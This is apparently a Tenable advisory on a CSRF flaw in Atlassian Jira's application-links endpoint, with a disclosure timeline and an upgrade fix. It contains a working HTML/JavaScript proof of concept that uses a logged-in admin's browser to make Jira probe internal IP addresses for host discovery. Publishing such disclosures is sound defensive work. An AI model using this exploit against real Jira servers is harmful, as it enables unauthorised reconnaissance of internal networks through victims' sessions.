Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Atlassian Jira CSRF

Medium

Synopsis

It is possible to perform a CSRF on the following request for configuring application links: /rest/applinks/3.0/applicationlinkForm/manifest.json

To exploit this vulnerability an attacker would need to convince a user with an active WebSudo session (and permissions to create application links,) to click on a crafted link.

Proof of Concept:

The below code generates a request to the Jira server to initiate the process of creating an application link for a range of IP addresses (this script was set to test the range 172.16.68.220-240 on port 80). The script times how long it takes to get a response from each host, and posts it on a textArea on the web page.

<html>
  <head>
     <meta name="referrer" content="no-referrer">
  </head>
  <body>
    <h2>CSRF Host Discovery Scanner via the Application Links</h2>
    
    <p><button onclick="startScan()">scan</button>
    <br>
    <textarea id="textarea" rows=34 cols=50></textarea>

    <script>
      function startScan() {
        doFetch('172.16.68.151', 220, 240);   
      }

      function doFetch(jiraIp, currentIp, endIp) {
        var timer = Date.now();
        var url = '172.16.68.' + currentIp.toString();
        fetch('http://' + jiraIp + ':8080/rest/applinks/3.0/applicationlinkForm/manifest.json?url=http://' + url +'/insertMessageHere:80&_=1572448964763',
        { 
          method: 'GET', 
          credentials: 'include'
        })
        .then(function(response) {
          return response.text();
        })
        .then(function(text) {
          timer = Date.now() - timer;
          document.getElementById("textarea").value += "\nip: " + url + " \tResponse time: " + timer + "ms";
          if (currentIp < endIp)
            doFetch(jiraIp, currentIp + 1, endIp);
        })
      }
    </script>
  </body>
</html>

Solution

Upgrade to 8.7.0 or above.

Disclosure Timeline

11/08/2019 - Tenable reports the vulnerability. 90-day date is 02/07/2020.
11/08/2019 - Automated response received with tracking ID of SEC-2253.
11/10/2019 - Human response received. They will verify the report.
11/10/2019 - Atlassian confirms the report. Assigns issue as JRASERVER-70226.
11/12/2019 - Tenable disputes CVSS score proposed by Atlassian. Proposes an amendment.
12/03/2019 - Tenable follows up.
12/03/2019 - Atlassian agrees with the CVSS revision.
12/05/2019 - Tenable acknowledges.
12/16/2019 - Tenable asks for an update.
12/16/2019 - Atlassian says the "SLA is for Jan 28th. At that stage, it will be included in the next release for Jira Server."
01/02/2020 - Tenable asks for an update. Reminds Atlassian of 90-day date.
01/06/2020 - Atlassian is getting us a solid release date.
01/09/2020 - Atlassian says the fix will be included in Jira 8.8.0, which will be released around March 16. Asks if we can delay our advisory.
01/10/2020 - Tenable offers 14 day extension, pushing our advisory to Feb 21. Asks if Atlassian can make this date.
01/21/2020 - Tenable follows up to ensure we are both on the same page.
01/21/2020 - Atlassian is unable to confirm whether they can release in time. They will get back to us. Thanks us for our offer of 14-day extension.
01/29/2020 - Atlassian will be able to release a fix in JIRA 8.7.0 and JSD 4.7.0 on Feb 2.
01/30/2020 - Tenable thanks Atlassian. We will publish our advisory shortly after the patch is released.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io

FREE FOR 30 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Choose Your Subscription Option:

Buy Now
Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year. Full details here.

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 30 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 30 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Get a Demo of Tenable.sc

Please fill out the form below with your contact information and a sales representative will contact you shortly to schedule a demo. You may also include a short comment (limited to 255 characters). Please note that fields with asterisks (*) are mandatory.

Try for Free Contact Sales

Try Tenable Lumin

FREE FOR 30 DAYS

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Buy Tenable Lumin

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

Request a demo of Tenable.ot

Get the Operational Technology Security You Need.
Reduce the Risk You Don’t.